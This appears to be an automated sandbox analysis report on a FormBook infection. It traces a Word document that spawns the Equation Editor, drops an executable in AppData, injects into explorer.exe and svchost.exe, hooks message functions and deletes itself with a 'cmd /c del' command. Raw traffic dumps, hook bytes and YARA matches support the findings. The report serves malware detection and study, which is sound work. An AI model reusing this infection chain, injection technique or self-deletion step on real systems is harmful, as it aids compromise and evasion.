                                                    Data Raw: 33 31 45 41 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 69 73 20 62 65 69 6e 67 20 63 72 65 61 74 65 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 45 41 41 41 41 42 41 43 41 59 41 41 41 43 71 61 58 48 65 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 43 48 68 4a 52 45 46 55 65 41 48 64 57 32 6c 73 48 45 55 57 72 71 71 5a 73 54 33 6a 32 46 6d 62 48 42 78 42 58 73 79 47 73 41 73 43 43 52 49 52 67 6a 69 63 41 32 4a 48 52 41 74 45 51 74 48 43 6a 32 69 31 69 68 41 53 67 6e 43 45 4f 46 6e 45 6a 39 6a 68 4e 41 67 70 49 43 37 78 41 36 52 6f 45 59 65 49 69 42 30 57 45 67 64 4c 69 59 53 53 72 41 54 69 32 4a 42 73 49 42 41 4d 50 6d 49 6e 64 6a 7a 6a 65 44 78 56 2b 37 33 78 74 4e 55 7a 37 75 6e 70 71 75 6b 5a 6a 2b 67 66 72 75 70 36 72 39 37 33 76 61 2b 72 71 32 71 36 32 35 77 56 2b 4c 6a 77 30 4b 75 52 6f 64 35 54 69 35 52 53 53 78 52 6e 69 78 52 6a 63 7a 68 6a 4e 59 43 74 55 55 78 52 79 54 6a 6a 67 79 67 47 59 52 75 45 72 5a 63 72 64 70 42 7a 66 71 42 36 7a 6e 6b 48 75 78 65 75 6a 35 4a 50 6f 51 37 67 2b 58 39 63 65 2b 6a 56 30 48 2f 37 42 74 5a 49 4a 65 39 6e 54 46 33 48 46 41 73 61 6f 58 41 32 44 6e 6d 2b 45 46 78 73 76 33 78 32 37 58 75 48 46 36 36 50 47 38 56 78 36 65 53 72 41 48 2f 73 66 4b 75 69 4c 39 72 39 45 4b 37 6b 2f 62 69 36 46 37 6e 67 61 70 73 77 53 6e 34 42 32 65 30 58 38 4b 71 32 59 30 30 50 6e 4e 4d 4f 6b 4b 57 44 62 77 4a 55 64 54 79 39 49 43 48 6a 2f 30 4c 79 56 32 66 42 38 71 55 5a 68 4c 38 4d 69 4e 44 64 77 34 30 62 6a 2f 67 52 55 50 67 52 70 4c 4a 39 32 39 2f 47 31 66 6a 68 51 69 64 50 58 41 6d 44 73 41 6a 54 44 2b 35 35 6a 34 42 49 52 2b 74 71 4a 65 57 48 49 4f 4f 4c 6d 42 70 4a 53 53 37 45 48 64 48 47 35 70 30 61 66 61 61 34 35 69 56 41 5a 55 66 4c 56 56 4b 70 2f 62 67 73 4d 36 5a 45 4c 6b 59 44 5a 32 63 46 35 7a 65 4d 4e 47 37 2b 79 68 54 4f 2b 4b 72 4e 4f 39 41 57 6c 6c 4c 74 6e 4c 62 6b 4b 57 4d 49 54 78 79 49 53 39 45 46 4f 48 55 36 75 68 36 67 64 61 62 41 50 76 61 72 53 33 45 78 43 6d 6c 30 43 39 42 79 31 78 76 72 50 6f 37 4e 7a 51 56 47 71 44 35 33 77 71 62 70 31 7a 6e 68 43 2b 74 2f 62 46 67 33 71 68 76 61 36 42 62 6f 6a 58 62 2f 76 56 53 53 70 34 53 4a 43 33 48 53 54 5a 37 38 6a 51 51 41 35 46 39 4e 77 41 72 62 78 34 79 54 74 67 42 58 66 50 4e 75 47 64 62 69 4a 59 56 4e 52 6a 38 36 63 53 4a 75 75 6a 32 31 42 66 6a 70 35 32 50 58 41 53 53 69 43 31 51 45 2f 30 69 4b 6d 78 61 55 74 67 41 4a 79 57 37 55 51 69 69 69 73 77 6b 33 62 51 47 51 54 30 6e 4d 2f 46 6c 30 31 65 61 6d 4c 59 42 53 38 72 77 73 34 4e 50 65 62 4d 4a 4e 57 77 43 73 75 62 4f 6d 50 64
                                                    Data Ascii: 31EA<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website is being created</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="apple-touch-icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAAAXNSR0IArs4c6QAACHhJREFUeAHdW2lsHEUWrqqZsT3j2FmbHBxBXsyGsAsCCRIRgjicA2JHRAtEQtHCj2i1ihASgnCEOFnEj9jhNAgpIC7xA6RoEYeIiB0WEgdLiYSSrATi2JBsIBAMPmIndjzjeDxV+73xtNUz7unpqukZj+gfrup6r973va+rq2q625wV+Ljw0KuRod5Ti5RSSxRnixRjczhjNYCtUUxRyTjjgygGYRuErZcrdpBzfqB6znkHuxeuj5JPoQ7g+X9ce+jV0H/7BtZIJe9nTF3HFAsaoXA2Dnm+EFxsv3x27XuHF66PG8Vx6eSrAH/sfKuiL9r9EK7k/bi6F7ngapswSn4B2e0X8Kq2Y00PnNMOkKWDbwJUdTy9ICHj/0LyV2fB8qUZhL8MiNDdw40bj/gRUPgRpLJ929/G1fjhQidPXAmDsAjTD+55j4BIR+tqJeWHIOOLmBpJSS7EHdHG5p0afaa45iVAZUfLVVKp/bgsM6ZELkYDZ2cF5zeMNG7+yhTO+KrNO9AWllLtnLbkKWMITxyIS9EFOHU6uh6gdabAPvarS3ExCml0C9By1xvrPo7NzQVGqD53wqbp1znhC+t/bFg3qhva6BbojXb/vVSSp4SJC3HSTZ78jQQA5F9NwArbx4yTtgBXfPNuGdbiJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebMJNWwCsubOmPd
                                                    Sep 28, 2021 20:44:30.735765934 CEST665INData Raw: 4d 73 42 45 79 34 61 51 73 41 37 4a 49 64 41 53 62 63 54 41 52 49 5a 4c 6b 41 70 64 43 73 7a 55 31 66 41 4d 56 36 53 79 46 54 52 77 34 47 33 50 51 46 59 4b 7a 50 45 62 77 30 47 72 57 35 61 51 75 41 48 5a 63 32 53 4c 47 30 4d 65 47 6d 4c 51 41 65
                                                    Data Ascii: MsBEy4aQsA7JIdASbcTARIZLkApdCszU1fAMV6SyFTRw4G3PQFYKzPEbw0GrW5aQuAHZc2SLG0MeGmLQAeQJTsLWDCTVsAxaQvDyMLMSpMuGkLUB4KduFZvfZsW4iE02PyxAS39NZcZ9oCDK54/Azn7D+5AhfbTpyImy6utgAEgMlmry5Qof1NORkJIJgoOQFMORkJsCi8eC/23d2Fvqpe4xMX4uTV3+5nJMC+hga8tFRv2ANNb
                                                    Sep 28, 2021 20:44:30.735779047 CEST666INData Raw: 32 71 32 36 68 31 4b 6b 73 44 79 34 35 6e 62 78 54 4e 67 74 56 48 4b 2b 59 47 79 64 6d 30 2b 6d 6a 59 63 43 6b 77 4c 77 59 46 44 72 32 53 4a 75 77 58 57 45 6d 52 6e 54 35 44 78 76 41 5a 4a 66 61 73 76 45 36 39 34 6d 70 55 6d 4b 58 64 5a 47 68 46
                                                    Data Ascii: 2q26h1KksDy45nbxTNgtVHK+YGydm0+mjYcCkwLwYFDr2SJuwXWEmRnT5DxvAZJfasvE694mpUmKXdZGhFpS9a5Ja64K/XADZj5fiVsQeQnwpFLi1GD0TVwRrX0D5+IFi4BVOrVZNqeSMAmbODjZvbYZT4K17S9Vj7LhtzHrr/YKlvTj/NjGxuYFT3Iu7f0okac7Wo9gJP3J3p6rjlVhZwWruneg6YGhXL5O9pwChPdsvUiM8QY
                                                    Sep 28, 2021 20:44:30.735796928 CEST667INData Raw: 37 4a 78 5a 6b 77 4f 4a 32 31 63 31 5a 57 33 34 32 4e 7a 55 67 54 63 2f 57 43 69 4d 4d 77 54 30 4c 33 43 52 2f 53 50 36 46 44 65 79 4b 4b 6d 61 79 47 47 33 6d 66 31 6b 6a 63 6b 59 67 56 36 6c 39 63 75 30 65 71 50 50 55 51 61 5a 4e 33 48 42 74 66
                                                    Data Ascii: 7JxZkwOJ21c1ZW342NzUgTc/WCiMMwT0L3CR/SP6FDeyKKmayGG3mf1kjckYgV6l9cu0eqPPUQaZN3HBtfRQ5lFC/2XcSuD/woHqgGX6gqVVq1MXPqjVdyX5G9MMu0BDTEk8QnTSHu80fpFMM7xulyXPi5UhtRRQzGOrg0cdmkrPaXqS6dz3qHyuv1C5VR6jzApauYMfw9EUUS2k/LdHwD9mAf+FZcQuU/slhoN/xvxGBQudlmK
                                                    Sep 28, 2021 20:44:30.735814095 CEST669INData Raw: 53 70 39 4e 76 42 36 44 52 31 52 39 34 79 4e 42 67 45 57 53 56 56 33 61 54 32 4b 6e 2b 6d 6f 62 4e 6d 6b 5a 37 76 2f 33 56 63 76 32 50 33 79 41 68 44 51 7a 61 32 45 30 65 78 53 63 78 44 31 48 50 75 4a 47 79 62 45 6c 49 44 6f 46 37 65 61 69 63 55
                                                    Data Ascii: Sp9NvB6DR1R94yNBgEWSVV3aT2Kn+mobNmkZ7v/3Vcv2P3yAhDQza2E0exScxD1HPuJGybElIDoF7eaicUrVx33v/Yf/Hz4A/g9CJD5JUYQSwQkkIGpEUDsD4H9AHwClJSntrNLmJKfdTBJDzYw0Wq+Gmk0hyiGmonPlWhqPY+XSLjqXLsqcy9JF46JyUbroU2zr5eH/1+pf23v1qh/Ajor8Vz5Zwg18UD5C1dzpeS9navVHVen
                                                    Sep 28, 2021 20:44:30.735832930 CEST670INData Raw: 67 49 44 79 4b 44 36 43 45 6d 53 41 37 45 41 69 6d 44 31 46 77 61 39 75 69 63 2f 44 7a 59 43 31 6b 44 32 51 41 5a 68 69 44 30 63 77 49 45 73 77 6e 51 39 70 44 76 71 51 42 6f 78 62 50 4b 66 52 65 2b 66 67 30 46 50 41 63 75 4e 31 42 58 69 4e 6b 49
                                                    Data Ascii: gIDyKD6CEmSA7EAimD1Fwa9uic/DzYC1kD2QAZhiD0cwIEswnQ9pDvqQBoxbPKfRe+fg0FPAcuN1BXiNkIKgVNhdLApGNxtGXlkQwnexghY83jrDem9u9WkQFJpjPV8rEBjqBRGH04c3gu0hnkT6GYoWbQHPRevxXTydKF7ugZ052ituN/bP2wAcQg1RDFQx6hypg2kYz3v9fpHgf0TFShhoaWLtlY7BycXPlThEe8fOGXgKk0j
                                                    Sep 28, 2021 20:44:30.735848904 CEST671INData Raw: 59 6b 32 53 67 35 53 4d 6e 4b 49 4f 2b 73 46 72 43 53 55 56 4e 51 31 74 2b 52 46 43 70 36 4a 58 5a 34 43 52 69 5a 6d 46 4e 64 6b 41 64 67 35 4f 4c 68 35 65 50 6e 36 42 4d 6d 6c 73 69 6a 4c 4e 4e 49 4e 5a 63 2f 30 6c 54 63 76 71 56 72 41 71 4b 46
                                                    Data Ascii: Yk2Sg5SMnKIO+sFrCSUVNQ1t+RFCp6JXZ4CRiZmFNdkAdg5OLh5ePn6BMmlsijLNNINZc/0lTcvqVrAqKFQPl4gERMXEJSSlIo2MrJy8gvW0UWLLjr3TD1vrTuprkiAgGAgUBkeUJWYrWLNhy046BDqWr38i6YVxL5PgTnVi+dJxzblv/Rg/4We/FNlaLaJNUoC6+lQancFksTlcnkAoEkvSwKKhkfFosi2xdz9HRDBwTImucVd
                                                    Sep 28, 2021 20:44:30.735869884 CEST673INData Raw: 4a 57 6e 70 33 59 63 58 33 4a 55 52 67 31 72 6c 37 74 4a 32 55 64 32 77 31 79 62 7a 35 70 68 78 72 79 33 72 4c 70 73 43 4e 38 45 44 79 4a 54 64 38 52 4f 72 72 63 59 58 78 48 44 76 64 52 32 63 4a 33 2f 69 41 4c 7a 78 79 6d 51 68 72 6f 66 4e 50 46
                                                    Data Ascii: JWnp3YcX3JURg1rl7tJ2Ud2w1ybz5phxry3rLpsCN8EDyJTd8ROrrcYXxHDvdR2cJ3/iALzxymQhrofNPFgzT4Z2sUSoAnISUj50TBmZKKmoaWCx1Xem4M3HkxCRUmUqp02XIVqtBTX/3SpE2XPkPGTKWXWV5lHelAO+22V6P9DjrsqGatOnXrddIQ6RMG/LsMYjJwHD3GjffJcerYW/2cbUmIC7pmQ5/0dPj0YrWPfaXh2fCWO
                                                    Sep 28, 2021 20:44:30.735888004 CEST674INData Raw: 6d 56 44 2f 57 69 4b 58 47 50 39 79 62 78 76 2b 54 36 67 78 38 6d 50 35 63 41 49 63 55 79 4c 6f 78 62 56 2f 46 6f 49 78 32 2b 63 34 61 35 59 51 49 45 77 55 2f 6c 4e 5a 65 6a 32 46 61 45 54 30 6c 2b 67 54 67 30 56 63 6f 77 2b 53 41 49 67 4c 35 49
                                                    Data Ascii: mVD/WiKXGP9ybxv+T6gx8mP5cAIcUyLoxbV/FoIx2+c4a5YQIEwU/lNZej2FaET0l+gTg0Vcow+SAIgL5IVSS1rEJMCYL3WHF0whC5L1Ar/KPslVH+k6CkVCOQM1yu8rnNyttA2VzrB9LgFgG6u3EWclTuyA7QZ+j1NQ7sQU00+b0vFyqO4eQ9mKm9Ht6qQWjIUMXF8xBlEgNZRXRP7+CASJwCEUIWP668lC9+uN4/brUYN2fbQ
                                                    Sep 28, 2021 20:44:30.735902071 CEST675INData Raw: 4a 57 73 47 62 44 6c 70 33 2b 48 71 4f 73 6f 38 71 64 71 46 53 63 79 6e 6c 63 76 6f 63 62 68 6b 6d 56 56 6b 41 74 74 4a 4e 43 71 30 75 6c 30 52 6c 4d 46 70 76 44 35 51 6d 45 49 72 47 6b 6e 6e 49 62 34 41 32 4e 6a 45 31 79 70 75 41 44 6f 53 49 52
                                                    Data Ascii: JWsGbDlp3+HqOso8qdqFScynlcvocbhkmVVkAttJNCq0ul0RlMFpvD5QmEIrGknnIb4A2NjE1ypuADoSIRVf3UUIIkPZZHAHoHZK8UpLFtdQgu7T3G9rJrZDDSVjnjDywyNyELiFCpCSg7coAZuZ6/AG9rzopMzJjMh4S489IfxGapXOegGc3qkT4Ody5cBeGOOheiKZI+8Dn3UJx3ga+FiUlU8kTSIQ1HrlOsS7qXvTJ3TamL8
                                                    Sep 28, 2021 20:44:30.898358107 CEST677INData Raw: 33 46 43 30 0d 0a 47 33 34 54 48 64 44 68 33 5a 49 51 41 67 41 63 41 6f 4f 57 63 73 68 69 79 65 38 71 43 79 41 36 71 44 5a 55 4a 73 54 59 68 41 67 44 67 31 71 6c 6b 64 6d 41 42 4b 43 42 44 59 49 69 55 30 57 62 4e 49 39 4d 53 72 56 69 7a 59 63 74
                                                    Data Ascii: 3FC0G34THdDh3ZIQAgAcAoOWcshiye8qCyA6qDZUJsTYhAgDg1qlkdmABKCBDYIiU0WbNI9MSrVizYctOOvQdt3kFVRFxMG99FQUAAAAaGRgaGY8mNe5dNp0IK5viu2rcHqKDqwATaLbzcpxOwDsRuOp2G7MJgyxEAEnolXNCFnabqBm02E8X45B1dIeeXttzgaXXyC3idrjrXrpP8yC465bnEp/SI3CKj9CXUWdCfARxhYXI


                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

                                                    Function NameHook TypeActive in Processes
                                                    PeekMessageAINLINEexplorer.exe
                                                    PeekMessageWINLINEexplorer.exe
                                                    GetMessageWINLINEexplorer.exe
                                                    GetMessageAINLINEexplorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: USER32.dll
                                                    Function NameHook TypeNew Data
                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE9
                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE9
                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE9
                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE9

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: WINWORD.EXE PID: 292 Parent PID: 596

                                                    General

                                                    Start time:20:42:18
                                                    Start date:28/09/2021
                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                    Imagebase:0x13fc30000
                                                    File size:1423704 bytes
                                                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: EQNEDT32.EXE PID: 2692 Parent PID: 596

                                                    General

                                                    Start time:20:42:19
                                                    Start date:28/09/2021
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                    Imagebase:0x400000
                                                    File size:543304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: ibeframnk863.exe PID: 2800 Parent PID: 2692

                                                    General

                                                    Start time:20:42:20
                                                    Start date:28/09/2021
                                                    Path:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Imagebase:0xff0000
                                                    File size:624640 bytes
                                                    MD5 hash:CE20BD8F40F78DA603DD17D756745B0A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Antivirus matches:
                                                    • Detection: 20%, ReversingLabs
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: ibeframnk863.exe PID: 2852 Parent PID: 2800

                                                    General

                                                    Start time:20:42:24
                                                    Start date:28/09/2021
                                                    Path:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Imagebase:0xff0000
                                                    File size:624640 bytes
                                                    MD5 hash:CE20BD8F40F78DA603DD17D756745B0A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Chronological Activities

                                                    Analysis Process: ibeframnk863.exe PID: 1580 Parent PID: 2800

                                                    General

                                                    Start time:20:42:24
                                                    Start date:28/09/2021
                                                    Path:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Imagebase:0xff0000
                                                    File size:624640 bytes
                                                    MD5 hash:CE20BD8F40F78DA603DD17D756745B0A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                    Chronological Activities

                                                    Analysis Process: explorer.exe PID: 1764 Parent PID: 1580

                                                    General

                                                    Start time:20:42:25
                                                    Start date:28/09/2021
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0xffa10000
                                                    File size:3229696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                                                    Chronological Activities

                                                    Analysis Process: svchost.exe PID: 1832 Parent PID: 1580

                                                    General

                                                    Start time:20:43:03
                                                    Start date:28/09/2021
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\svchost.exe
                                                    Imagebase:0x5e0000
                                                    File size:20992 bytes
                                                    MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                                                    Chronological Activities

                                                    Analysis Process: cmd.exe PID: 2928 Parent PID: 1832

                                                    General

                                                    Start time:20:43:05
                                                    Start date:28/09/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\user\AppData\Roaming\ibeframnk863.exe'
                                                    Imagebase:0x4a110000
                                                    File size:302592 bytes
                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Chronological Activities

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >

                                                      Analysis Process: ibeframnk863.exe PID: 2800 Parent PID: 2692 ibeframnk863.exeCOMMON

                                                      Executed Functions

                                                      Function 002E1A40, Relevance: 2.6, Strings: 2, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PS3n$PS3n
                                                      • API String ID: 0-726683640
                                                      • Opcode ID: 216ddfde7e5aa22e51e8bb184691af82e932870eda3546e75bd67231fbff3f10
                                                      • Instruction ID: f9e8dfdd8b63f638f0a6085fbe3e9ec84348b137a5626bf60193b9cbb238cf62
                                                      • Opcode Fuzzy Hash: 216ddfde7e5aa22e51e8bb184691af82e932870eda3546e75bd67231fbff3f10
                                                      • Instruction Fuzzy Hash: 22212FB8D16299CFCB50DFAAD8845FEBBB1BB49300F50806AD805B7310DB745A60CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00CB7F80, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CB8247
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419945369.0000000000CB0000.00000040.00000001.sdmp, Offset: 00CB0000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 02eae3ee66b3ae3c01e193824bd2bd822a1fff4d77f88ee6e5b3c665581165b1
                                                      • Instruction ID: e01d32779475a4611ecbc2bd751139e8ee28592c0dd9985c864bd6214cbaa98f
                                                      • Opcode Fuzzy Hash: 02eae3ee66b3ae3c01e193824bd2bd822a1fff4d77f88ee6e5b3c665581165b1
                                                      • Instruction Fuzzy Hash: 2DC14570D00229CFDB20DFA4C845BEEBBB1BF49304F1095A9D919B7250DB749A89CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00CB7AF8, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00CB7BCB
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419945369.0000000000CB0000.00000040.00000001.sdmp, Offset: 00CB0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 9b9b4aa590799becbf463c714986dba6c0e70ddcea66df18fc99ad7bbf30f948
